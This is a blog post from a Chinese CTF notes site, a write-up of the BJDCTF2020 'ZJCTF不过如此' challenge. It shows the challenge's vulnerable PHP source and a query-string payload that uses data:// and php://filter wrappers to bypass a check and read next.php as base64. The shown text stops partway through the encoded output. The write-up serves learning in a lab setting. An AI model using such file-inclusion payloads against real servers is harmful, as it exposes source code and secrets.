<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>BJDCTF2020-ZJCTF不过如此 | MIXBP</title>
  <meta name="keywords" content=" 刷题笔记 , php特性 ">
  <meta name="description" content="BJDCTF2020-ZJCTF不过如此 | MIXBP">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="BUUCTF2018-OnlineTool1首先启动靶机并访问，看到一串源码 123456789101112131415161718&lt;?phpif (isset($_SERVER[&#x27;HTTP_X_FORWARDED_FOR&#x27;])) &#123;    $_SERVER[&#x27;REMOTE_ADDR&#x27;] &#x3D; $_SERVER[&#x27;HTTP_X_FOR">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF2018-OnlineTool1">
<meta property="og:url" content="https://mixbp.github.io/master/2025/03/21/BUUCTF2018-OnlineTool1/index.html">
<meta property="og:site_name" content="MIXBP">
<meta property="og:description" content="BUUCTF2018-OnlineTool1首先启动靶机并访问，看到一串源码 123456789101112131415161718&lt;?phpif (isset($_SERVER[&#x27;HTTP_X_FORWARDED_FOR&#x27;])) &#123;    $_SERVER[&#x27;REMOTE_ADDR&#x27;] &#x3D; $_SERVER[&#x27;HTTP_X_FOR">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://mixbp.github.io/image/BUUCTF2018-OnlineTool1-1.png">
<meta property="og:image" content="https://mixbp.github.io/image/BUUCTF2018-OnlineTool1-1.png">
<meta property="article:published_time" content="2025-03-21T11:50:32.000Z">
<meta property="article:modified_time" content="2025-03-21T12:11:22.526Z">
<meta property="article:author" content="MIXBP">
<meta property="article:tag" content="刷题笔记">
<meta property="article:tag" content="escapeshellarg()和escapeshellcmd()、单引号逃逸">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://mixbp.github.io/image/BUUCTF2018-OnlineTool1-1.png">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>MIXBP</span>
</div>

<div class="icon">
    
        
            <a title="github"
               href="https://mixbp.github.io/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="email"
               href="mailto:2439254357@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=2439254357&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
</div>



    <a class="more-menus">更多菜单</a>



<ul>
    <li>
        <div class="all active" data-rel="All">All
            
                <small>(44)</small>
            
        </div>
    </li>
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
                <a class="dynamic-menu "
                   target="_self"
                   
                   href="https://mixbp.github.io/">MIXBP</a>
        
            
                <a class="dynamic-menu "
                   target="_blank"
                        
                   href="https://mixbp.github.io/">github</a>
        
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">About</a>
        
        <a style="width: 50%"
                
                                           class="friends">Friends</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="44">
<input type="hidden" id="yelog_site_word_count" value="119.9k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://mixbp.github.io/">MIXBP</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="search shortcut key i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="switch to outline view shortcut key w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="return"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="case sensitive"></i>
            <i class="iconfont icon-tag" data-title="label"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">outline</div>
            <i class="iconfont icon-list" data-title="switch to article list"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>报错注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>堆叠注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>命令执行</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>日志包含</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>刷题笔记</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文件包含</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文件上传</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息搜集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>学习笔记</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>正则表达式</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>做题笔记</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>escapeshellarg()和escapeshellcmd()、单引号逃逸</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>filter伪协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>HTML</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>http协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>linux find -name模糊查询文件</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>MySQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>payload构造</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php反序列化</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP反序列化漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php特性</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sql注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssrf</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>waf绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xss</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xss漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xxe</a>
            </li>
        
    </div>

</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        
        <a  class="All "
           href="/2025/03/21/BUUCTF2018-OnlineTool1/"
           data-tag="刷题笔记,escapeshellarg()和escapeshellcmd()、单引号逃逸"
           data-author="" >
            <span class="post-title" title="BUUCTF2018-OnlineTool1">BUUCTF2018-OnlineTool1</span>
            <span class="post-date" title="2025-03-21 19:50:32">2025/03/21</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/21/BJDCTF2020-ZJCTF%E4%B8%8D%E8%BF%87%E5%A6%82%E6%AD%A4/"
           data-tag="刷题笔记,php特性"
           data-author="" >
            <span class="post-title" title="BJDCTF2020-ZJCTF不过如此">BJDCTF2020-ZJCTF不过如此</span>
            <span class="post-date" title="2025-03-21 19:04:56">2025/03/21</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/20/%E7%BD%91%E9%BC%8E%E6%9D%AF2020%E6%9C%B1%E9%9B%80%E7%BB%84phpweb1/"
           data-tag="刷题笔记,命令执行,php反序列化,linux find -name模糊查询文件"
           data-author="" >
            <span class="post-title" title="网鼎杯2020朱雀组phpweb1">网鼎杯2020朱雀组phpweb1</span>
            <span class="post-date" title="2025-03-20 23:56:35">2025/03/20</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/20/BSidesCF2020Hadabadday1/"
           data-tag="刷题笔记,文件包含"
           data-author="" >
            <span class="post-title" title="BSidesCF2020Hadabadday1">BSidesCF2020Hadabadday1</span>
            <span class="post-date" title="2025-03-20 23:55:26">2025/03/20</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/20/%E7%BD%91%E9%BC%8E%E6%9D%AF2018Fakebook1/"
           data-tag="刷题笔记,sql注入,php反序列化,ssrf"
           data-author="" >
            <span class="post-title" title="网鼎杯2018Fakebook1">网鼎杯2018Fakebook1</span>
            <span class="post-date" title="2025-03-20 23:53:35">2025/03/20</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/19/ctfshow-ssrf/"
           data-tag="学习笔记,ssrf"
           data-author="" >
            <span class="post-title" title="ctfshow-ssrf">ctfshow-ssrf</span>
            <span class="post-date" title="2025-03-19 20:05:14">2025/03/19</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/19/ctfshow-xxe/"
           data-tag="学习笔记,xxe"
           data-author="" >
            <span class="post-title" title="ctfshow-xxe">ctfshow-xxe</span>
            <span class="post-date" title="2025-03-19 13:32:30">2025/03/19</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/16/ssrf/"
           data-tag="学习笔记,ssrf"
           data-author="" >
            <span class="post-title" title="ssrf">ssrf</span>
            <span class="post-date" title="2025-03-16 21:44:06">2025/03/16</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/14/ctfshow-php%E5%BA%8F%E5%88%97%E5%8C%96/"
           data-tag="学习笔记,php反序列化"
           data-author="" >
            <span class="post-title" title="ctfshow-php序列化">ctfshow-php序列化</span>
            <span class="post-date" title="2025-03-14 22:11:16">2025/03/14</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/14/GXYCTF2019-BabySQli1/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="GXYCTF2019-BabySQli1">GXYCTF2019-BabySQli1</span>
            <span class="post-date" title="2025-03-14 20:44:55">2025/03/14</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/13/%E7%BD%91%E9%BC%8E%E6%9D%AF2020%E9%9D%92%E9%BE%99%E7%BB%84-AreUSerialz1/"
           data-tag="刷题笔记,文件包含,php反序列化"
           data-author="" >
            <span class="post-title" title="网鼎杯2020青龙组-AreUSerialz1">网鼎杯2020青龙组-AreUSerialz1</span>
            <span class="post-date" title="2025-03-13 23:36:35">2025/03/13</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/13/ZJCTF2019-NiZhuanSiWei1/"
           data-tag="刷题笔记,文件包含"
           data-author="" >
            <span class="post-title" title="ZJCTF2019-NiZhuanSiWei1">ZJCTF2019-NiZhuanSiWei1</span>
            <span class="post-date" title="2025-03-13 20:39:05">2025/03/13</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/12/RoarCTF2019-EasyCalc1/"
           data-tag="刷题笔记,命令执行,waf绕过"
           data-author="" >
            <span class="post-title" title="RoarCTF2019-EasyCalc1">RoarCTF2019-EasyCalc1</span>
            <span class="post-date" title="2025-03-12 19:36:00">2025/03/12</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/11/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019-HardSQL1/"
           data-tag="刷题笔记,sql注入,报错注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019-HardSQL1">极客大挑战2019-HardSQL1</span>
            <span class="post-date" title="2025-03-11 15:31:27">2025/03/11</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/11/%E5%BC%BA%E7%BD%91%E6%9D%AF2019-%E9%9A%8F%E4%BE%BF%E6%B3%A81/"
           data-tag="刷题笔记,sql注入,堆叠注入"
           data-author="" >
            <span class="post-title" title="强网杯2019-随便注1">强网杯2019-随便注1</span>
            <span class="post-date" title="2025-03-11 00:07:32">2025/03/11</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/08/ctfshow-sqli-labs/"
           data-tag="sql注入,学习笔记"
           data-author="" >
            <span class="post-title" title="ctfshow-sqli-labs">ctfshow-sqli-labs</span>
            <span class="post-date" title="2025-03-08 17:51:18">2025/03/08</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/04/ctfshow-sql%E6%B3%A8%E5%85%A5/"
           data-tag="sql注入,学习笔记"
           data-author="" >
            <span class="post-title" title="ctfshow-sql注入">ctfshow-sql注入</span>
            <span class="post-date" title="2025-03-04 23:42:23">2025/03/04</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/02/php%E7%89%B9%E6%80%A7/"
           data-tag="php特性,学习笔记"
           data-author="" >
            <span class="post-title" title="php特性">php特性</span>
            <span class="post-date" title="2025-03-02 20:14:41">2025/03/02</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/24/ctfshow-php%E7%89%B9%E6%80%A7/"
           data-tag="php特性,学习笔记"
           data-author="" >
            <span class="post-title" title="ctfshow-php特性">ctfshow-php特性</span>
            <span class="post-date" title="2025-02-24 18:53:16">2025/02/24</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/23/ctfshow-xss/"
           data-tag="学习笔记,xss"
           data-author="" >
            <span class="post-title" title="ctfshow-xss">ctfshow-xss</span>
            <span class="post-date" title="2025-02-23 17:12:49">2025/02/23</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/23/ctfshow-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/"
           data-tag="学习笔记,信息搜集"
           data-author="" >
            <span class="post-title" title="ctfshow-信息搜集">ctfshow-信息搜集</span>
            <span class="post-date" title="2025-02-23 15:24:36">2025/02/23</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/17/ctfshow-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/"
           data-tag="学习笔记,命令执行"
           data-author="" >
            <span class="post-title" title="ctfshow-命令执行">ctfshow-命令执行</span>
            <span class="post-date" title="2025-02-17 00:00:48">2025/02/17</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/14/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"
           data-tag="学习笔记,PHP反序列化漏洞"
           data-author="" >
            <span class="post-title" title="PHP反序列化">PHP反序列化</span>
            <span class="post-date" title="2025-02-14 00:51:53">2025/02/14</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/12/xss%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"
           data-tag="学习笔记,xss漏洞"
           data-author="" >
            <span class="post-title" title="xss漏洞总结">xss漏洞总结</span>
            <span class="post-date" title="2025-02-12 03:30:15">2025/02/12</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/11/xss-labs/"
           data-tag="学习笔记,xss漏洞"
           data-author="" >
            <span class="post-title" title="xss-labs">xss-labs</span>
            <span class="post-date" title="2025-02-11 23:43:19">2025/02/11</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/01/linux%E5%9F%BA%E7%A1%80%E5%91%BD%E4%BB%A4/"
           data-tag="学习笔记,linux"
           data-author="" >
            <span class="post-title" title="linux基础命令">linux基础命令</span>
            <span class="post-date" title="2025-02-01 22:14:44">2025/02/01</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/29/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/"
           data-tag="学习笔记,命令执行"
           data-author="" >
            <span class="post-title" title="命令执行">命令执行</span>
            <span class="post-date" title="2025-01-29 22:54:38">2025/01/29</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/29/ctfshow-web82/"
           data-tag="文件包含,做题笔记"
           data-author="" >
            <span class="post-title" title="ctfshow-web82">ctfshow-web82</span>
            <span class="post-date" title="2025-01-29 04:36:22">2025/01/29</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"
           data-tag="文件包含,学习笔记"
           data-author="" >
            <span class="post-title" title="文件包含漏洞总结">文件包含漏洞总结</span>
            <span class="post-date" title="2025-01-29 02:22:55">2025/01/29</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/26/ctfshow-web160/"
           data-tag="做题笔记,文件上传,日志包含"
           data-author="" >
            <span class="post-title" title="[ctfshow]web160">[ctfshow]web160</span>
            <span class="post-date" title="2025-01-26 16:37:35">2025/01/26</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/26/buuctf%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98upload/"
           data-tag="做题笔记,文件上传"
           data-author="" >
            <span class="post-title" title="buuctf极客大挑战upload">buuctf极客大挑战upload</span>
            <span class="post-date" title="2025-01-26 16:36:39">2025/01/26</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/22/upload/"
           data-tag="学习笔记,文件上传"
           data-author="" >
            <span class="post-title" title="upload">upload</span>
            <span class="post-date" title="2025-01-22 15:22:47">2025/01/22</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/19/python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,python"
           data-author="" >
            <span class="post-title" title="python学习笔记">python学习笔记</span>
            <span class="post-date" title="2025-01-19 01:39:35">2025/01/19</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/09/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019Http/"
           data-tag="刷题笔记,http协议"
           data-author="" >
            <span class="post-title" title="极客大挑战2019Http">极客大挑战2019Http</span>
            <span class="post-date" title="2025-01-09 16:47:44">2025/01/09</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/09/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019SecretFile/"
           data-tag="刷题笔记,filter伪协议"
           data-author="" >
            <span class="post-title" title="极客大挑战2019SecretFile">极客大挑战2019SecretFile</span>
            <span class="post-date" title="2025-01-09 01:36:08">2025/01/09</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019LoveSQL/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019LoveSQL">极客大挑战2019LoveSQL</span>
            <span class="post-date" title="2025-01-05 20:00:42">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019Havefun/"
           data-tag="刷题笔记,payload构造"
           data-author="" >
            <span class="post-title" title="极客大挑战2019Havefun">极客大挑战2019Havefun</span>
            <span class="post-date" title="2025-01-05 19:35:48">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019EasySQL/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019EasySQL">极客大挑战2019EasySQL</span>
            <span class="post-date" title="2025-01-05 19:10:32">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/03/sql%E6%B3%A8%E5%85%A5/"
           data-tag="sql注入,学习笔记"
           data-author="" >
            <span class="post-title" title="sql注入">sql注入</span>
            <span class="post-date" title="2025-01-03 21:14:16">2025/01/03</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/29/MySQL/"
           data-tag="学习笔记,MySQL"
           data-author="" >
            <span class="post-title" title="MySQL">MySQL</span>
            <span class="post-date" title="2024-12-29 19:30:51">2024/12/29</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/28/php%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,正则表达式"
           data-author="" >
            <span class="post-title" title="正则表达式笔记">正则表达式笔记</span>
            <span class="post-date" title="2024-12-28 20:46:55">2024/12/28</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/26/PHP%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,php"
           data-author="" >
            <span class="post-title" title="PHP学习笔记">PHP学习笔记</span>
            <span class="post-date" title="2024-12-26 23:50:15">2024/12/26</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/25/HTML%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,HTML"
           data-author="" >
            <span class="post-title" title="HTML学习笔记">HTML学习笔记</span>
            <span class="post-date" title="2024-12-25 23:54:00">2024/12/25</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/25/welcome/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="welcome">welcome</span>
            <span class="post-date" title="2024-12-25 20:38:33">2024/12/25</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="Toggle full screen shortcut key s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-BJDCTF2020-ZJCTF不过如此" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">BJDCTF2020-ZJCTF不过如此</h1>
    
    <div class="article-meta">
        
        
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">刷题笔记</a>
            
            <a class="color1">php特性</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2025-03-21 19:26:42'>2025-03-21 19:04</time>
        
    </div>
    <div class="article-meta">
        
        <span>Count:1.2k</span>
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="Jump to comment area">
            <a href="#comments">
                Comment:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#BJDCTF2020-ZJCTF%E4%B8%8D%E8%BF%87%E5%A6%82%E6%AD%A4"><span class="toc-text">BJDCTF2020-ZJCTF不过如此</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86%EF%BC%9A"><span class="toc-text">原理：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A"><span class="toc-text">知识点：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#phpinfo"><span class="toc-text">${phpinfo()}</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#preg-replace%E3%80%81-e"><span class="toc-text">preg_replace、&#x2F;e</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%90%91%E5%BC%95%E7%94%A8"><span class="toc-text">反向引用</span></a></li></ol></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="BJDCTF2020-ZJCTF不过如此"><a href="#BJDCTF2020-ZJCTF不过如此" class="headerlink" title="BJDCTF2020-ZJCTF不过如此"></a>BJDCTF2020-ZJCTF不过如此</h1><p>1、首先打开靶机就是源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-variable">$text</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;text&quot;</span>];<br><span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;file&quot;</span>];<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$text</span>)&amp;&amp;(<span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-variable">$text</span>,<span class="hljs-string">&#x27;r&#x27;</span>)===<span class="hljs-string">&quot;I have a dream&quot;</span>))&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.<span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-variable">$text</span>,<span class="hljs-string">&#x27;r&#x27;</span>).<span class="hljs-string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/flag/&quot;</span>,<span class="hljs-variable">$file</span>))&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Not now!&quot;</span>);<br>    &#125;<br><br>    <span class="hljs-keyword">include</span>(<span class="hljs-variable">$file</span>);  <span class="hljs-comment">//next.php</span><br>    <br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>这里很明显要我们去包含next.php然后查看其中的源码，和之前那题很像也是两个传参，还是用data:&#x2F;&#x2F;伪协议去绕过file_get_contents函数</p>
<p>2、get方法传值</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">?text=data:<span class="hljs-regexp">//</span>text<span class="hljs-regexp">/plain,I have a dream&amp;file=php:/</span><span class="hljs-regexp">/filter/</span>read=convert.base64-encode/resource=<span class="hljs-keyword">next</span>.php<br></code></pre></td></tr></table></figure>

<p>回显出一行base64编码字符串</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gcode">PD<span class="hljs-number">9</span>waHAKJGlkID<span class="hljs-number">0</span>gJF<span class="hljs-number">9</span>HRVRbJ<span class="hljs-number">2</span>lkJ<span class="hljs-number">107</span>CiRfU<span class="hljs-number">0</span>VTU<span class="hljs-number">0</span>lPTls<span class="hljs-symbol">naWQnXSA9</span>ICRpZDsKCmZ<span class="hljs-number">1</span>bm<span class="hljs-symbol">N0</span>aW<span class="hljs-number">9</span>uIG<span class="hljs-symbol">NvbXBsZXgoJHJlLCAkc3</span>RyKSB<span class="hljs-number">7</span>CiAgICByZXR<span class="hljs-number">1</span>c<span class="hljs-name">m4</span>gcHJlZ<span class="hljs-number">19</span>yZXBsYW<span class="hljs-symbol">NlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9</span>laScsCiAgICAgICAgJ<span class="hljs-number">3</span><span class="hljs-symbol">N0</span>c<span class="hljs-symbol">nRvbG93</span>ZXIoIlxcMSIpJywKICAgICAgICAkc<span class="hljs-number">3</span>RyCiAgICApOwp<span class="hljs-number">9</span>CgoKZ<span class="hljs-name">m9</span>yZWFjaCgkX<span class="hljs-number">0</span>dF<span class="hljs-attr">VCBhcyAkcmUgPT4</span>gJH<span class="hljs-symbol">N0</span>cikgewogICAgZW<span class="hljs-symbol">NobyBjb21</span>wbGV<span class="hljs-number">4</span>KCRyZSwgJH<span 